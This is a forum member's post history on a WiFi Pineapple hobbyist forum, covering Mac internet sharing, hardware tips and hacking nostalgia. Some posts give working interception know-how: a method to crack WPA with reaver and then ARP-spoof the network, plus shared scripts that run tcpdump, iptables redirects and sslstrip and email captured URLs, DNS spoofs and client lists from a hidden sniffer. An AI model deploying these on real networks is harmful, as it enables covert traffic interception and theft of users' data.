telot
-
Posts
803 -
Joined
-
Last visited
-
Days Won
12
Posts posted by telot
-
-
It's picky, but it does look like they've fixed it. You have to do everything exactly in order and if you don't, you have to hard restart the box. The other major downside is, I lose the ability to access 172.16.42.1/pineapple after ics is turned on. I have to ssh in, run my tcpdump and sslstrip, make sure it working, then turn on ics. After that I just rely on my cronjob'd email reports to make sure everythings working ok, which is alright but also kinda sucks. Mac ics is better now (since it at least kind of works with the stock ip) but still lacks the convenience and versatility that windows and Linux have.
FYI I'm running ML on a 2012 air with thunderbolt eth adapter and 2.5 firmware.
telot
-
I'll be giving this a try soon! I got a screamin 11inch air and I just hate having to change all my pineapples parameters around just to plug it into the mac. Thanks for the how to thesugarat!
telot
-
I'm not really sure what you mean leapole. If you're saying that you can setup the ssid of the pineapple to be the same as the wpa-encrypted access point, then somehow "set the network key" the same as the wpa-encrypted access point, deauth said access point and replace it with the pineapples own wpa-encrypted with the same ssid? I'd love to know how to do this, because right now the pineapple is not setup to do anything with encryption as far as I know.
What I think the OP is after is this: some access point has wpa and he wants to leave his pineapple there so that it can crack the wpa (assuming via reaver), join the wpa network, then execute some MITM attacks (cap all the packets, use sslstrip, urlsnarf, what have you) on the still-working original wpa encrypted access point.
telot
-
No interceptor is not what you're looking for - the interceptor (and the markIV conversion to interceptor - which is not currently available but promised) is for wired MITM (ethernet). I'm not sure if the pineapple has wpa_supplicant, but it might be available in opkg. Do the following:
opkg update
opkg install wpa-supplicant
If that works, you're golden. Hack the WPA key with reaver, then connect to the AP, then run some arpspoof (it should be part of the dsniff package - opkg install dsniff).
I don't have my markIV handy, so I'm just guessing about all this stuff. Give it a try and report back here!
telot
-
Are you using a MarkIV?
Checkout Mr. Protocol's guide to posting questions (its a form that tells us some pertinent info) and maybe we can be of more help.
telot
-
Hey Neworld - thank you for the DC19 link, I hadn't seen this (FREAKIN AMAZING) trick before. It seems theres some dependencies, aside from gcc...I found these on samsclass.info (which has great tuts on thc RA attacks):
libnet-pcap-perllibpcap0.8-devlibssl-dev -
@WatskeBart - you figured out my grand plot!! I wanted all the logs! DRINK ALL THE BOOZE - LOG ALL THE THINGS!
I'm glad you guys enjoy tho - feel free to post any scripts you can't live without!
telot
-
Good morning everyone!
Its been a while since I've contributed, so this is way overdue. I see a lot on new faces on these forums, which is a wonderful thing! I've been jam packed busy, so theres nothing too fun to share at the moment, but hopefully some of you will find these simple scripts useful. They are designed with a dropbox/sniffer application in mind. Sniff all the packets and keep me abreast of whats going on. Enjoy!
dumpNstrip.sh (I either run this upon startup or keep it bound to the WPS button for great win)
#!/bin/sh
tcpdump -i eth0 -w /usb/cap.pcap -n net 172.16.42.0/24 &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
sslstrip -w /usb/sslstrip.log &
[/CODE]telots-emailreport.sh (I keep this on a cron job for once every 20 minutes - keeps me up to date on the cap file size, number of "guests", and system stability)
[CODE]#!/bin/sh
TODAY=$(date +"%m-%d-%y")
rm /usb/emailreport.log
du -h /usb/cap.$TODAY.pcap > /usb/emailreport.log
cat /www/pineapple/logs/associations.log >> /usb/emailreport.log
cat /www/pineapple/logs/urlsnarf.log >> /usb/emailreport.log
./killurlsnarf.sh
./starturlsnarf.sh
cat /www/pineapple/logs/dnsspoof.log >> /usb/emailreport.log
cat /proc/net/arp >> /usb/emailreport.log
cat /tmp/dhcp.leases; echo '\n'; cat /proc/net/arp; echo '\n'; grep KARMA /tmp/karma.log | grep -v -e enabled | grep -v -e malloc | grep -v -e CTRL_IFACE | grep -v -e KARMA_STATE | grep -v -e Request >> /usb/emailreport.log
ssmtp -v EMAIL@DOMAIN.com < /usb/emailreport.log[/CODE]telot
-
zomg finally they've gone back to their roots!
Donated!
-
Well, if we're waxin' nostalgic...
When I was 10 I got my first AOL account. A few months later I heard about AOHell and downloaded it. Many laughs were had at the expense of innocent chat rooms full of 1990s chumps. Soon after I too stumbled upon Netbus...again many laughs were had, this time at the expense of my parents (we had two computers that I networked). Not too long after that it was lan parties and overclocking celeron 566's to 850mhz with a gorb (golden orb) for laughs and profit. I like to think that I've been doin for teh lulz long before it was cool - ha!
telot
-
Where did you find this doc? Is there some crowd-sourced effort to detail the vulns of every router? If so, I'd love to contribute!
Thanks!
telot
-
Very nice! I share your desire to hide a raspberry pi in plain sight. This is a great implementation - thanks for sharing!
telot
-
I did some tests a while back regarding range at different voltages - typical range on either 5V or 9V or 12V was 30ft in a kind of "mixed office" setting with desks, chairs, cube walls, etc. I'm sure in a wide open environment it would be greater. You can lookup my old post for exact numbers of txpower, dbm, rssi values, etc. Glad the pigtail worked for ya though!
telot
-
You can try any number of other ports - just make sure your firewall on your server side is port forwarding the appropriate ports. So you can either change the port on your server (/etc/ssh/sshd_config) or if your router/firewall supports it, you can do port mapping. For instance, I can map port 2020 to 22 on my server. So when I'm out in the world, I type ssh -p 2020 user@telotsawesomeserver.com and my router/firewall makes port 2020 from outside internet connect to port 22 on my inside intranet at my house. All this does is prevent script kiddies from attempting to brute force my server - security through obscurity.
telot
-
I went so far as to start creating a giant how-to website. Trouble is, I can't do it by myself with my current work and family schedule. When I've talked to Seb et al about this, he wants us to use the wiki. The registration process is easy - theres very little vetting. Basically, from what I understand, is if you post to the forums, you'll be quickly granted access to the wiki. I've done a number of how-tos (sslstrip, tcpdump, poe cables, etc) here on the forums that I believe are still up to date, but I haven't confirmed them since 2.5, so I'm hesitant to put them up.
A stickied thread here on the forums is nice, as we're all here anyways, but the problem is editing. If one person compiles all the info and the thread gets stickied, and that person stops visiting the forums - the information will go out of date without a way for the rest of us to fix it. The wiki solves this problem by allowing anyone to fix it at a later time.
telot
-
FBI Surveillance Van #32 (a classic!)
IwubKrispyKremes
Naked Lady Machine
The last ones my favorite :D
telot
-
This sounds great Challenger! This has been on the communities "To Do" list for a while now! Do you have any screenshots of your work in progress? I'm sure many of us would like to take a sneak peek if possible. Cant wait to check it out
telot
-
haha need you even ask? digip rarely gives bad advice 'round these parts, as evidenced above :) Irongeek infamously redirected a "hackme.irongeek.com" back to 127.0.0.1, so anyone trying to attack it would be attacking themselves...pretty hilarious.
telot
-
The pineapple only attracts OPEN probe requests - no wpa/wep/radius will be responded to.
telot
-
This has happened since the Mark3 (perhaps before). It doesn't hurt anything - just looks ugly in the terminal. Call it a feature and move on!
Just kidding, but I can see why this wouldn't be fixed anytime soon, as its not harmful and theres so many other awesome things for Seb to work on!
telot
-
hehe sniff the br0 dude
though most bro's I know don't like being sniffed by nerds like I us.
telot
-
AOHell - first time I saw entire chat rooms get kicked out at once, I was hooked. This was back in '94 or '95.
By 10 I was online - 12 I had bought my first issue of 2600.
Back issues of 2600 - the community may sometimes scoff at 2600, and oftentimes scoff at Emmanuel, the zine does a great job. When I read it today, I may not get immediately applicable technical knowledge, but it gets me into the mindset, the spirit - of what being a hacker is all about.
telot
-
-
Thanks for sharing! I just bought the Belkin that petertfm has also confirmed as working...the reviews on it were less than stellar (breaking after 1 month for half dozen people) - so if the belkin fails I'll surely order this one. Thanks itsm0ld
telot
Mac Ics Works
in WiFi Pineapple Mark IV
Posted
If Seb brings a thread offtopic, that means its ok right? :)
To be honest Seb, I haven't any reason to upgrade. Everything I want from the pineapple works wonderfully. Until something game changing comes along, I see lots of risk in upgrading (since I have everything tuned perfectly right now) and no benefit.
telot